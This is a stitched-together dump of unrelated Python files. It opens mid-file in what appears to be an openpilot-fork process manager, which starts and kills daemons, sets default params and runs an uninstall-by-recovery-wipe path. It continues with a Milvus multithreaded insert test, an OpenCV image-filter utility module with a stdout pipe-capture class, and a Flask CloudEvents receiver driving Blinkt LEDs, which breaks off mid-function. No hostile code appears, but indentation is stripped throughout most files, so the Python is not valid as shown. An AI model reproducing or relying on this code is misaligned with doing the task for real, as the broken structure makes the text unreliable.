from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"driverview": "selfdrive.monitoring.driverview",
"appd": "selfdrive.kyd.appd.appd",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
'deleter',
'appd',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
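# Illustrative call (assumed names, not part of the original file): a fork could register an
# extra Python process with the manager, e.g.
#   register_managed_process("mydaemon", "selfdrive.mydaemon", car_started=False)
# which adds it to managed_processes and to the persistent list started by manager_thread().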
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
EnableLogger = int(params.get('OpkrEnableLogger'))
#EnableLogger = (params.get("RecordFront") != b"0")
if not EnableLogger:
car_started_processes.remove( 'loggerd' )
persistent_processes.remove( 'logmessaged' )
persistent_processes.remove( 'uploader' )
persistent_processes.remove( 'logcatd' )
persistent_processes.remove( 'updated' )
persistent_processes.remove( 'deleter' )
persistent_processes.remove( 'tombstoned' )
else:
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started and "driverview" not in running:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("IsOpenpilotViewEnabled", "0"),
("OpkrAutoShutdown", "0"),
("OpkrAutoScreenOff", "0"),
("OpkrUIBrightness", "0"),
("OpkrEnableDriverMonitoring", "1"),
("OpkrEnableLogger", "0"),
("OpkrEnableGetoffAlert", "1"),
("OpkrEnableLearner", "0"),
("OpkrAutoResume", "1"),
("OpkrAccelProfile", "0"),
("OpkrAutoLanechangedelay", "0"),
("OpkrRunMixplorer", "0"),
("OpkrRunQuickedit", "0"),
("OpkrRunSoftkey", "0"),
("OpkrRunNavigation", "0"),
("OpkrBootNavigation", "0"),
("PutPrebuiltOn", "0"),
("FingerprintIssuedFix", "0"),
("LdwsCarFix", "0"),
("LateralControlMethod", "0"),
("CruiseStatemodeSelInit", "0"),
("LateralControlPriority", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
test_thread.py
|
import concurrent.futures
import datetime
import random
import sys
import threading
import time
sys.path.append('.')
from factorys import time_it
from milvus import Milvus
dimension = 512
number = 100000
table_name = 'multi_task'
def add_vector_task(milvus, vector):
status, ids = milvus.insert(table_name=table_name, records=vector)
assert status.OK(), "add vectors failed"
assert len(ids) == len(vector)
@time_it
def thread_pool_add_vector(milvus, pool_size, vectors):
with concurrent.futures.ThreadPoolExecutor(max_workers=pool_size) as executor:
for _ in range(pool_size):
executor.submit(add_vector_task, milvus, vectors)
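# Illustrative call (not part of the original test): submit the same batch from 4 worker
# threads, assuming 'client' is an already-connected Milvus instance:
#   vectors = [[random.random() for _ in range(dimension)] for _ in range(10)]
#   thread_pool_add_vector(client, 4, vectors)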
def test_run(gcon):
gmilvus = gcon
if gmilvus is None:
assert False, "Error occurred: connect failure"
status, exists = gmilvus.has_collection(table_name)
if exists:
gmilvus.drop_collection(table_name)
time.sleep(2)
table_param = {
'collection_name': table_name,
'dimension': dimension,
'index_file_size': 1024,
'metric_type': 1
}
gmilvus.create_collection(table_param)
for p in (1, 5, 10, 20, 40, 50, 100):
pool_size = p
step = number // pool_size
vectors = [[random.random() for _ in range(dimension)] for _ in range(step)]
thread_pool_add_vector(gmilvus, p, vectors)
time.sleep(1.5)
_, gcount = gmilvus.count_entities(table_name)
print(gcount)
def test_mult_insert(gcon):
def multi_thread_opr(client, collection_name, utid):
collection_param = {
'collection_name': collection_name,
'dimension': 64
}
vectors = [[random.random() for _ in range(64)] for _ in range(10000)]
status = client.create_collection(collection_param)
assert status.OK()
        status, _ = client.insert(collection_name, vectors)
assert status.OK()
thread_list = []
for i in range(10):
t = threading.Thread(target=multi_thread_opr, args=(gcon, "multi_table_{}".format(random.randint(0, 10000)), i))
t.start()
thread_list.append(t)
for tr in thread_list:
tr.join(timeout=None)
print("Done")
|
util.py
|
#
# Copyright (c) 2017, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
import sys
import cv2 as cv
import numpy as np
try:
import pyximport; pyximport.install()
except:
pass
# ==========================================
def subcopy(A, B, afrom, bfrom, bto):
    """Copy the block of A starting at afrom into the (inclusive) box bfrom..bto of B."""
    afrom, bfrom, bto = map(np.asarray, [afrom, bfrom, bto])
shape = bto - bfrom
b = tuple(map(slice, bfrom, bto + 1))
a = tuple(map(slice, afrom, afrom + shape + 1))
B[b] = A[a]
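# Illustrative use (not part of the original module): copy the 2x2 block A[0:2, 0:2]
# into B[1:3, 1:3] (the 'bto' bound is inclusive):
#   A = np.arange(16).reshape(4, 4)
#   B = np.zeros((4, 4), dtype=int)
#   subcopy(A, B, afrom=(0, 0), bfrom=(1, 1), bto=(2, 2))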
def rgba2rgb(img):
if img.dtype == np.uint8 and len(img.shape) == 3: # convert rgba to rgb
w, h, *_ = img.shape
ret = np.zeros((w, h, 3), dtype=np.uint8)
for i in range(3): ret[:,:,i] = img[:,:,i]
img = ret
return img
def rgba2gray(img, conv=(0.21, 0.72, 0.07)):
if img.dtype == np.uint8 and len(img.shape) == 3: # convert rgba to gray
w, h, *_ = img.shape
ret = np.zeros((w, h), dtype=np.uint8)
for i in range(3): ret[:,:] = np.add(ret[:,:], np.multiply(img[:,:,i], conv[i]))
img = ret
return img
# ==========================================
def clahe(img, threshold=1.0):
""" Contrast Limited Adaptive Histogram Equalization (CLAHE) """
img = rgba2rgb(img)
b, g, r = cv.split(img) # split on blue, green and red channels
clahe = cv.createCLAHE(clipLimit=threshold, tileGridSize=(8, 8))
b2 = clahe.apply(b) # apply CLAHE to each channel
g2 = clahe.apply(g)
r2 = clahe.apply(r)
return cv.merge((b2, g2, r2)), # merge changed channels
def equalize(img):
""" Histogram Equalization """
img = rgba2rgb(img)
b, g, r = cv.split(img) # split on blue, green and red channels
b2 = cv.equalizeHist(b) # apply Histogram Equalization to each channel
g2 = cv.equalizeHist(g)
r2 = cv.equalizeHist(r)
return cv.merge((b2, g2, r2)), # merge equalized channels
# ==========================================
def static(img, threshold=0.01):
    # keep a per-caller accumulator in module globals, keyed by the calling function's name
    call = 'static_' + sys._getframe().f_back.f_code.co_name
h, w = img.shape
if not call in globals():
globals()[call] = np.zeros((h, w), dtype=img.dtype)
prev = globals()[call]
weights = img
temp = img * weights + prev * (1 - weights)
mask = np.where(temp > prev)
prev[mask] = temp[mask]
globals()[call] = prev
return prev,
def heal(img, history=5, threshold=0.05):
call = 'heal_' + sys._getframe().f_back.f_code.co_name
h, w = img.shape
if not call in globals():
globals()[call] = []
hist = globals()[call]
impro = np.zeros((h, w), dtype=img.dtype)
for i in range(len(hist)):
mask = np.where(np.logical_and(hist[i] > np.median(hist[i]) / 2, True))
impro[mask] = hist[i][mask]
hist.append(img)
if len(hist) > history:
hist.pop(0)
return impro,
def denoise(img, threshold=0.05):
h, w = img.shape
kernel_size = 5
kernel = np.ones((kernel_size, kernel_size), dtype=np.uint8)
impro = np.zeros((h, w), dtype=img.dtype)
maxed = cv.dilate(img, kernel, iterations=1)
    idx = np.where(np.abs(maxed - img) > threshold)
impro[idx] = maxed[idx]
return impro,
def invert(img):
img = 1 - img
return img,
def stretch(img):
avg = np.average(img[img > 0]) # avg of non-black pixels
while abs(avg - 0.5) > 0.05: # avg is about 5 % off mid-gray?
d = (2 * avg) - 1
img = img * (1 - d)
avg = np.average(img[img > 0])
img[img > 1] = 1
img[img < 0] = 0
return img,
# ==========================================
def blur(img, size=0, cutoff=True):
h, w = img.shape
if size == 0:
k = len(np.where(img == 0.0)[0]) / ((h + w) / 2)
if k > 0:
s = min(int(k+1) * 3, 3)
return blur(img, s, cutoff)
n = int(np.sqrt(size))
convmat = np.ones((size, size), np.uint8) # equal-weighted convolution matrix
xn, yn = (size + size // 4) * n, (size + size // 8) * n
b = cv.dilate(img, convmat, iterations=n)
b = cv.resize(b, (w + xn, h + yn))
#b = cv.blur(img, (size, size))
#b = cv.GaussianBlur(img, (size, size), 0)
#b = cv.medianBlur(img, min(5, size - abs(size % 2 - 1)))
#b = cv.bilateralFilter(img, size, size * 2, size * 2)
if cutoff: b = b[yn // 2:-yn // 2, xn // 2:-xn // 2]
return b,
# ==========================================
def encircle(img, mask, minsize=10, color=(127, 127, 127)):
img = rgba2rgb(img)
cnts, hier = cv.findContours(mask, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
for i in range(len(cnts)):
cv.drawContours(mask, cnts, i, color, 2, cv.LINE_8, hier, 0)
if len(cnts) > 0:
c = max(cnts, key=cv.contourArea)
((x, y), radius) = cv.minEnclosingCircle(c)
cen = (int(x), int(y))
M = cv.moments(c)
cof = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
if radius > minsize:
cv.circle(img, cen, int(radius), color, 2)
cv.circle(img, cof, 2, color, -1)
return img, cof, cen, radius
return img, None, None, None
def trace(img, points, color, length=10, thick=1):
direction = [0, 0]
a, b = len(points), -1
for i in np.arange(1, len(points)):
if points[i-1] is None or points[i] is None: continue
if i < a: a = i
if i > b: b = i
th = int(np.sqrt(points.maxlen / float(i + 1)) * thick)
cv.line(img, points[i-1], points[i], color, th)
if a < b:
xn, yn = points[a]
xo, yo = points[b]
dx = xo - xn
dy = yo - yn
if np.abs(dx) > length // 2: direction[0] = -1 if np.sign(dx) == 1 else +1
if np.abs(dy) > length // 2: direction[1] = +1 if np.sign(dy) == 1 else -1
return img, tuple(direction)
# ==========================================
def sobel(img, threshold=192):
""" (Sobel of x) and (Sobel of y) """
img = np.asarray(img * np.iinfo(np.uint8).max, dtype=np.uint8)
img[img > threshold] = 0
framex = cv.Sobel(img, cv.CV_8U, 1, 0)
datax = np.array(framex, dtype=np.uint8)
framey = cv.Sobel(img, cv.CV_8U, 0, 1)
datay = np.array(framey, dtype=np.uint8)
img = np.where((datax > datay), datax, datay)
img = np.asarray(img, dtype=np.uint8)
return img,
def masking(img, low=2, high=253):
""" masking by threshold (b/w) """
img = np.asarray(img * np.iinfo(np.uint8).max, dtype=np.uint8)
lower = np.array(low)
upper = np.array(high)
    mask = cv.inRange(img, lower, upper)  # 255 = within range (white), 0 = outside (black)
mask = img * mask
return mask,
# ==========================================
def laplacian(img, threshold=31, peaking=(255, 0, 0)):
""" Laplacian gradient filter """
img, gray = rgba2rgb(img), rgba2gray(img)
edges = cv.Laplacian(gray, cv.CV_8U)
img[edges > threshold] = peaking
return img, edges,
def canny(img, width=0.5, peaking=(255, 0, 0)):
""" adaptive Canny filter, edge detector """
#img = np.asarray(img * np.iinfo(np.uint8).max, dtype=np.uint8)
img, gray = rgba2rgb(img), rgba2gray(img)
avg = np.average(gray) # or median
std = int(np.std(gray) * width)
lower = int(max(0, avg - std))
upper = int(min(255, avg + std))
edges = cv.Canny(gray, lower, upper, apertureSize=3)
img[edges == 255] = peaking
return img, edges,
def hough(img, min_length=5, peaking=(255, 0, 0)):
""" Hough transformation, corner detection """
_, edges, *_ = canny(img)
lines = cv.HoughLinesP(edges, 1, np.pi / 180, min_length)
mask = np.zeros(img.shape[:2], np.uint8)
if lines is not None:
for line in lines:
for x1, y1, x2, y2 in line:
p = ((x1+x2) // 2, (y1+y2) // 2)
x, y = p
cv.line(mask, (x, y), (x, y), 255, 2) # dot
img = rgba2rgb(img)
img[mask == 255] = peaking
return img, mask,
def harris(img, peaking=(255, 0, 0)):
""" Harris corner detection """
img, gray = rgba2rgb(img), rgba2gray(img)
dest = cv.cornerHarris(src=gray, blockSize=2, ksize=5, k=0.1)
dest = cv.dilate(dest, None)
img[dest > 0.01 * dest.max()] = peaking
return img, dest,
# ==========================================
def bgsub(img):
""" Background subtraction (i.e. motion detection) with given algorithm (e.g. Gaussian-Mixture model) """
call = 'fgbg_' + sys._getframe().f_back.f_code.co_name
if not call in globals():
globals()[call] = cv.bgsegm.createBackgroundSubtractorMOG(history=20, nmixtures=10, backgroundRatio=0.75, noiseSigma=0.0) # declare a global
fgbg = globals()[call]
img = rgba2rgb(img)
img = np.asarray(img * np.iinfo(np.uint8).max, dtype=np.uint8)
mask = fgbg.apply(img)
return mask,
# def diff(img, history=5, threshold=0.05):
# call = 'heal_' + sys._getframe().f_back.f_code.co_name
# h, w = img.shape
# if not call in globals():
# globals()[call] = []
# hist = globals()[call]
# impro = np.zeros((h, w), dtype=img.dtype)
# for i in range(len(hist)):
# mask = np.where(np.logical_and(hist[i] > np.median(hist[i]) / 2, True))
# impro[mask] = hist[i][mask]
# hist.append(img)
# if len(hist) > history:
# hist.pop(0)
# return impro,
# def filter_sift(self):
# """ Scale-Invariant Feature Transform (SIFT). It is patented and not totally free """
# try:
# return self.get_features(cv2.xfeatures2d.SIFT_create())
# except cv2.error:
# return self.frame # return unchanged frame
# def filter_surf(self):
# """ Speeded-Up Robust Features (SURF). It is patented and not totally free """
# try:
# return self.get_features(cv2.xfeatures2d.SURF_create(4000))
# except cv2.error:
# return self.frame # return unchanged frame
# def filter_orb(self):
# """ Oriented FAST and Rotated BRIEF (ORB). It is not patented and totally free """
# return self.get_features(cv2.ORB_create())
# def filter_brief(self):
# """ BRIEF descriptors with the help of CenSurE (STAR) detector """
# gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) # convert to gray scale
# keypoints = cv2.xfeatures2d.StarDetector_create().detect(gray, None)
# keypoints, descriptor = cv2.xfeatures2d.BriefDescriptorExtractor_create().compute(gray, keypoints)
# return cv2.drawKeypoints(image=self.frame, outImage=self.frame, keypoints=keypoints,
# flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS, color=(51, 163, 236))
# def filter_optflow(self):
# """ Lucas Kanade optical flow """
# gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
# frame = self.frame.copy() # copy the frame
# if self.previous is None or self.previous.shape != gray.shape:
# self.previous = gray.copy() # save previous gray frame
# # Find new corner points of the frame
# self.opt_flow['points'] = cv2.goodFeaturesToTrack(
# gray, mask=None,
# **self.opt_flow['feature_params'])
# # Create a new mask image for drawing purposes
# self.opt_flow['mask'] = np.zeros_like(self.frame.copy())
# # If motion is large this method will fail. Ignore exceptions
# try:
# # Calculate optical flow. cv2.error could happen here.
# points, st, err = cv2.calcOpticalFlowPyrLK(
# self.previous, gray,
# self.opt_flow['points'], None, **self.opt_flow['lk_params'])
# # Select good points
# good_new = points[st == 1] # TypeError 'NoneType' could happen here
# good_old = self.opt_flow['points'][st == 1]
# # Draw the tracks
# for i, (new, old) in enumerate(zip(good_new, good_old)):
# a, b = new.ravel()
# c, d = old.ravel()
# # Draw lines in the mask
# self.opt_flow['mask'] = cv2.line(self.opt_flow['mask'], (a, b), (c, d),
# self.opt_flow['color'][i].tolist(), 2)
# # Draw circles in the frame
# frame = cv2.circle(frame, (a, b), 5, self.opt_flow['color'][i].tolist(), -1)
# # Update the previous frame and previous points
# self.previous = gray.copy()
# self.opt_flow['points'] = good_new.reshape(-1, 1, 2)
# return cv2.add(frame, self.opt_flow['mask']) # concatenate frame and mask images
# except (TypeError, cv2.error):
# self.previous = None # set optical flow to None if exception occurred
# return self.frame # return unchanged frame when error
# def filter_motion(self):
# """ Motion detection """
# if self.previous is None or self.previous.shape != self.frame.shape:
# self.previous = self.frame.copy() # remember previous frame
# return self.frame # return unchanged frame
# gray1 = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) # convert to grayscale
# gray2 = cv2.cvtColor(self.previous, cv2.COLOR_BGR2GRAY)
# self.previous = self.frame.copy() # remember previous frame
# return cv2.absdiff(gray1, gray2) # get absolute difference between two frames
# def filter_threshold(self):
# """ Adaptive Gaussian threshold """
# gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) # convert to gray scale
# return cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
# ==========================================
import os, threading
class PipeCapture:
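    """Capture everything written to a file-like stream (e.g. sys.stdout) by
    duplicating its file descriptor onto an os.pipe(); each complete line read
    from the pipe is handed to the publish callback given to open(). close()
    writes an ESC byte to unblock the reader thread, then restores the
    original descriptor.
    """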
ESC = b'\x1b' # 27
def __init__(self, stream, isthread=True):
self._stream = stream
self._isthread = isthread
self._descriptor = self._stream.fileno()
self._pipe_out, self._pipe_in = os.pipe()
self._worker = None
self._descriptor_dub = None
self._publish = None
self._buffer = []
def open(self, publish):
self._publish = publish
self._descriptor_dub = os.dup(self._descriptor)
os.dup2(self._pipe_in, self._descriptor)
if self._isthread:
self._worker = threading.Thread(target=self.read)
self._worker.start()
def close(self):
if self._publish is None: return
self._publish = None
self._stream.write(PipeCapture.ESC.decode('utf-8'))
self._stream.flush()
if self._isthread:
self._worker.join()
os.close(self._pipe_out)
os.dup2(self._descriptor_dub, self._descriptor)
def read(self):
while self._publish is not None:
char = os.read(self._pipe_out, 1)
if char == PipeCapture.ESC: break
self._buffer.append(char.decode('utf-8'))
if self._buffer[-1] == '\n':
self._publish(''.join(self._buffer))
self._buffer.clear()
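# Minimal usage sketch (illustrative; guarded so importing this module is unaffected):
# capture this process's stdout line by line and report it on stderr.
if __name__ == '__main__':
    import sys
    captured = []
    capture = PipeCapture(sys.stdout)
    capture.open(captured.append)      # publish callback receives complete lines
    print('hello through the pipe')
    capture.close()                    # flushes, stops the reader thread, restores stdout
    sys.stderr.write('captured: %r\n' % (captured,))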
|
cloudevents-receiver.py
|
#!/usr/bin/env python3
# copy to /usr/local/bin/cloudevents-receiver and use with cloudevents.service
import blinkt
import colorsys
import json
import random
import threading
import time
from flask import Flask, request
from cloudevents.http import from_http
app = Flask(__name__)
stop = threading.Event()
lock = threading.Lock()
activeThread = threading.Thread(name="default", target=(), args=(lock,stop,))
actions = [
'blink',
'brighten',
'clear',
'darken',
'rainbow',
'status'
]
brightness = 0.1
blinkt.set_brightness(brightness)
blinkt.set_clear_on_exit()
blinkt.clear()
blinkt.show()
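# Illustrative request (binary CloudEvents HTTP binding) that the handler below
# accepts; the source/id values are arbitrary examples:
#   curl -X POST http://localhost:3000/ \
#     -H "ce-specversion: 1.0" \
#     -H "ce-type: dev.pulsifer.blinky.request" \
#     -H "ce-source: example/client" \
#     -H "ce-id: 1" \
#     -H "content-type: application/json" \
#     -d '{"action": "rainbow"}'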
@app.route("/", methods=["POST"])
def home():
event = from_http(request.headers, request.get_data())
if event['type'] == 'dev.pulsifer.blinky.request':
action = event.data['action']
if action in actions:
global activeThread
if action == 'blink':
stop_running_thread()
activeThread = threading.Thread(name="blink", target=blink, args=(lock,stop,))
activeThread.start()
elif action == 'rainbow':
stop_running_thread()
activeThread = threading.Thread(name="rainbow", target=rainbow, args=(lock,stop,))
activeThread.start()
else: eval(action)()
return json.dumps({
                'action': activeThread.name,
'alive': activeThread.is_alive(),
'brightness': brightness,
})
return "", 501
return "", 400
def stop_running_thread():
    if activeThread.is_alive():
stop.set()
activeThread.join()
stop.clear()
def brighten():
global brightness
if brightness < 1: brightness += 0.1
if brightness > 1: brightness = 1
blinkt.set_brightness(brightness)
blinkt.show()
def darken():
global brightness
if brightness > 0.1: brightness -= 0.1
if brightness < 0.1: brightness = 0.1
blinkt.set_brightness(brightness)
blinkt.show()
def clear():
stop_running_thread()
blinkt.clear()
blinkt.show()
def status():
pass
def blink(lock, stop):
with lock:
while not stop.is_set():
for i in range(blinkt.NUM_PIXELS):
blinkt.set_pixel(i, random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
blinkt.show()
time.sleep(0.1)
blinkt.clear()
def rainbow(lock, stop):
spacing = 360.0 / 16.0
with lock:
while not stop.is_set():
hue = int(time.time() * 100) % 360
for x in range(blinkt.NUM_PIXELS):
offset = x * spacing
h = ((hue + offset) % 360) / 360.0
